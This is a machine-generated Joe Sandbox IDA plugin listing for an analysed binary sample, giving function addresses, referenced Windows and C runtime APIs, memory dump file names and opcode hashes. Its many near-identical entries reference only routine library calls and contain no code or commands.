API String ID: 1269201914-3032091488
Opcode ID: d2b19517d5a2cdddac9b202902770d444d2ca24bb16cda67b1b21c6b9ffdc6c1
Instruction ID: ad5601c980b4f6516dc792d6838492288fe7c341c5aa728ac1a9ecf6eede02cb
Opcode Fuzzy Hash: d2b19517d5a2cdddac9b202902770d444d2ca24bb16cda67b1b21c6b9ffdc6c1
Instruction Fuzzy Hash: 49A012D127D00A7C310C21047C02D36020FC4C0F50330840DB146900C0954038450431

Function 006FD951 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 1b3f041583424b398654d6d0b5ef9d844c581e5fba672974662ca4d50cd581ad
Instruction ID: ad5601c980b4f6516dc792d6838492288fe7c341c5aa728ac1a9ecf6eede02cb
Opcode Fuzzy Hash: 1b3f041583424b398654d6d0b5ef9d844c581e5fba672974662ca4d50cd581ad
Instruction Fuzzy Hash: 49A012D127D00A7C310C21047C02D36020FC4C0F50330840DB146900C0954038450431

Function 006FD93D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 9bb6d4a78f360d03da88de3ef5751ad2d950edf0fc85425c433586d7bc888dee
Instruction ID: ad5601c980b4f6516dc792d6838492288fe7c341c5aa728ac1a9ecf6eede02cb
Opcode Fuzzy Hash: 9bb6d4a78f360d03da88de3ef5751ad2d950edf0fc85425c433586d7bc888dee
Instruction Fuzzy Hash: 49A012D127D00A7C310C21047C02D36020FC4C0F50330840DB146900C0954038450431

Function 006FD91F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: d19993a346bbb68d2c8e2ae6f4c453942f5903acfa47cbd8591efe3887dc4345
Instruction ID: ad5601c980b4f6516dc792d6838492288fe7c341c5aa728ac1a9ecf6eede02cb
Opcode Fuzzy Hash: d19993a346bbb68d2c8e2ae6f4c453942f5903acfa47cbd8591efe3887dc4345
Instruction Fuzzy Hash: 49A012D127D00A7C310C21047C02D36020FC4C0F50330840DB146900C0954038450431

Function 006FD98D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 75cf3fda33505bbea48ce9388a64a34d484ebd081577f0e38fbcb1ad04715152
Instruction ID: ad5601c980b4f6516dc792d6838492288fe7c341c5aa728ac1a9ecf6eede02cb
Opcode Fuzzy Hash: 75cf3fda33505bbea48ce9388a64a34d484ebd081577f0e38fbcb1ad04715152
Instruction Fuzzy Hash: 49A012D127D00A7C310C21047C02D36020FC4C0F50330840DB146900C0954038450431

Function 006FD983 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: af3b71f4fcd95be22531ff94b6782c0698f8a071988a07fe0db9bc7b173307fd
Instruction ID: ad5601c980b4f6516dc792d6838492288fe7c341c5aa728ac1a9ecf6eede02cb
Opcode Fuzzy Hash: af3b71f4fcd95be22531ff94b6782c0698f8a071988a07fe0db9bc7b173307fd
Instruction Fuzzy Hash: 49A012D127D00A7C310C21047C02D36020FC4C0F50330840DB146900C0954038450431

Function 006FD997 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: cafa36d313466e1db16f0b4040f2a0b18c7a15388dbc4e8fa42f145c32c2005c
Instruction ID: ad5601c980b4f6516dc792d6838492288fe7c341c5aa728ac1a9ecf6eede02cb
Opcode Fuzzy Hash: cafa36d313466e1db16f0b4040f2a0b18c7a15388dbc4e8fa42f145c32c2005c
Instruction Fuzzy Hash: 49A012D127D00A7C310C21047C02D36020FC4C0F50330840DB146900C0954038450431

Function 0070B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0070AF1B: GetOEMCP.KERNEL32(00000000,?,?,0070B1A5,?), ref: 0070AF46

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0070B1EA,?,00000000), ref: 0070B3C4
GetCPInfo.KERNEL32(00000000,0070B1EA,?,?,?,0070B1EA,?,00000000), ref: 0070B3D7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 384f927d271fcd551663aaa38e1194d8a067c3f54a45e358e202ab12ff248094
Instruction ID: 8b125d4ca729242b31b6ec2da74603c433bee65b88d5fc9f749815137fadb734
Opcode Fuzzy Hash: 384f927d271fcd551663aaa38e1194d8a067c3f54a45e358e202ab12ff248094
Instruction Fuzzy Hash: 7F513570900386DEDB248F75C8816BABBE5EF41310F18826EE496872D3D73D9B45CB81

Function 006E1385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006E1385

Part of subcall function 006E6057: __EH_prolog.LIBCMT ref: 006E605C

Part of subcall function 006EC827: __EH_prolog.LIBCMT ref: 006EC82C
Part of subcall function 006EC827: new.LIBCMT ref: 006EC86F
Part of subcall function 006EC827: new.LIBCMT ref: 006EC893

new.LIBCMT ref: 006E13FE

Part of subcall function 006EB07D: __EH_prolog.LIBCMT ref: 006EB082

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 987fe11c03ed66b4dd038c9ecff59020d430e8294eac1283088f728d4321c064
Instruction ID: b9001f1f759d61c946b86528ebb77b17d43c800f0aa53a649a22039b7c2e1e63
Opcode Fuzzy Hash: 987fe11c03ed66b4dd038c9ecff59020d430e8294eac1283088f728d4321c064
Instruction Fuzzy Hash: C44136B0905B44DED724DF7984859E7FAE6FF19300F40492ED2EE83282DB326554CB15

Function 006E1380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006E1385

Part of subcall function 006E6057: __EH_prolog.LIBCMT ref: 006E605C

Part of subcall function 006EC827: __EH_prolog.LIBCMT ref: 006EC82C
Part of subcall function 006EC827: new.LIBCMT ref: 006EC86F
Part of subcall function 006EC827: new.LIBCMT ref: 006EC893

new.LIBCMT ref: 006E13FE

Part of subcall function 006EB07D: __EH_prolog.LIBCMT ref: 006EB082

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c858fc05a4aba6c44e17953ebb1c95bfb831b5c308f6a29d538d11c8fc49baf1
Instruction ID: 492c807069f13dfe4f841dff589803fef7559d725e585445078cda6c91ced800
Opcode Fuzzy Hash: c858fc05a4aba6c44e17953ebb1c95bfb831b5c308f6a29d538d11c8fc49baf1
Instruction Fuzzy Hash: 3F4136B0905B449EE724DF7984859E7FBE6FF19300F544A2ED2EE83282DB322554CB15

Function 006E971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,006E9EDC,?,?,006E7867), ref: 006E97A6
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,006E9EDC,?,?,006E7867), ref: 006E97DB

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 04637e0db784fac501720a611ee9d84c66751064f50a6f0ffe36163f20d5ec36
Instruction ID: 731d914d6b35f59a7e1157ca5cc6dde84882f87b1bfe1da786557e06e64d84ff
Opcode Fuzzy Hash: 04637e0db784fac501720a611ee9d84c66751064f50a6f0ffe36163f20d5ec36
Instruction Fuzzy Hash: 6A21E4B1115788AFDB308F25C885FE777EAEF49764F00892DF5E5822D1C374AC898A61

Function 006E9D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,006E7547,?,?,?,?), ref: 006E9D7C
SetFileTime.KERNELBASE(?,?,?,?), ref: 006E9E2C

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 6cc4586d66095d89cd61b2029ccce71cd8968e77af8343945c0fd84044dfbcb9
Instruction ID: bdb3abe1078528d0c8ca02040e3f0447e7002b711b4e79275cd87bb29222b564
Opcode Fuzzy Hash: 6cc4586d66095d89cd61b2029ccce71cd8968e77af8343945c0fd84044dfbcb9
Instruction Fuzzy Hash: 5821D33114A796ABD714DE26C891AEBBBE6AF95704F04491CF8C187241D329EA0CDBA1

Function 0070A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00713958), ref: 0070A4B8
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 0070A4C5

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 94332502f6bc21ca0238d16415ce500e223d0327331922c6b3f08564cdea5d34
Instruction ID: b76c95efbe92d742e50df5fbd58586e72a243e454f11119a152f16f7783d5977
Opcode Fuzzy Hash: 94332502f6bc21ca0238d16415ce500e223d0327331922c6b3f08564cdea5d34
Instruction Fuzzy Hash: 6711EB3BA11365EBDF21DE2CEC4489A73E59B84320B568310FD15AB2D4DA78DC41C6D2

Function 006E9B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,006E9B35,?,?,00000000,?,?,006E8D9C,?), ref: 006E9BC0
GetLastError.KERNEL32 ref: 006E9BCD

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 4457ced2aaf1947b61d1c7c37cbd98bbb931ab9d2d8b8d523f0c494509f42647
Instruction ID: bce6ce22f808d3d099efb841f6e9cef9d3e120836cd28fc2d9f24315fe702c7f
Opcode Fuzzy Hash: 4457ced2aaf1947b61d1c7c37cbd98bbb931ab9d2d8b8d523f0c494509f42647
Instruction Fuzzy Hash: 910108313163459B8B08CE26AC848BFB3ABAFC4321B10852DF81287390CB70D8059A30

Function 006E9E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 006E9E76
GetLastError.KERNEL32 ref: 006E9E82

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: cd26428fd8830840a7dce8163f721d67796e567a894481ce2b5b917ea8704583
Instruction ID: 8427698cb97d84ea287e6d1685dfc1deed21a0b7791f16559c60619de6bf0ada
Opcode Fuzzy Hash: cd26428fd8830840a7dce8163f721d67796e567a894481ce2b5b917ea8704583
Instruction Fuzzy Hash: E701B5713063405BEB34DE2ADC447ABB7EB9F88315F14893EB246C3780DA75DC488620

Function 00708606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00708627

Part of subcall function 00708518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0070C13D,00000000,?,007067E2,?,00000008,?,007089AD,?,?,?), ref: 0070854A

HeapReAlloc.KERNEL32(00000000,?,?,?,?,00720F50,006ECE57,?,?,?,?,?,?), ref: 00708663

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 970eec10bf1df53a99c65407e87029009461620bf1c9f5eac2af52953476acd2
Instruction ID: 554e9f02c12cb2b29b97dec9bb7000a1ebe9dbfa5e6f2d81d6120a25de78123c
Opcode Fuzzy Hash: 970eec10bf1df53a99c65407e87029009461620bf1c9f5eac2af52953476acd2
Instruction Fuzzy Hash: 5EF0C831101115E6CBE12A25AC04B6F37D89FD27A0F1A8315F8D4561D2DF7ED801559B

Function 006F0908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 006F0915
GetProcessAffinityMask.KERNEL32(00000000), ref: 006F091C

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 254997b43ed9acebe6536350af027d9309fdfcc64636c8358833b117d65480f5
Instruction ID: dff619200fccd416e786b5f6315c51f37533dba05e88c9e56b009a3688c1f340
Opcode Fuzzy Hash: 254997b43ed9acebe6536350af027d9309fdfcc64636c8358833b117d65480f5
Instruction Fuzzy Hash: 8EE09236A1010DBB7F09CAA89C059FB73DFEB08210720D179EA1AD3202F974DE0186A4

Function 007079B7 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0070B610: GetEnvironmentStringsW.KERNEL32 ref: 0070B619
Part of subcall function 0070B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0070B63C
Part of subcall function 0070B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0070B662
Part of subcall function 0070B610: _free.LIBCMT ref: 0070B675
Part of subcall function 0070B610: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0070B684

_free.LIBCMT ref: 007079FD
_free.LIBCMT ref: 00707A04

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
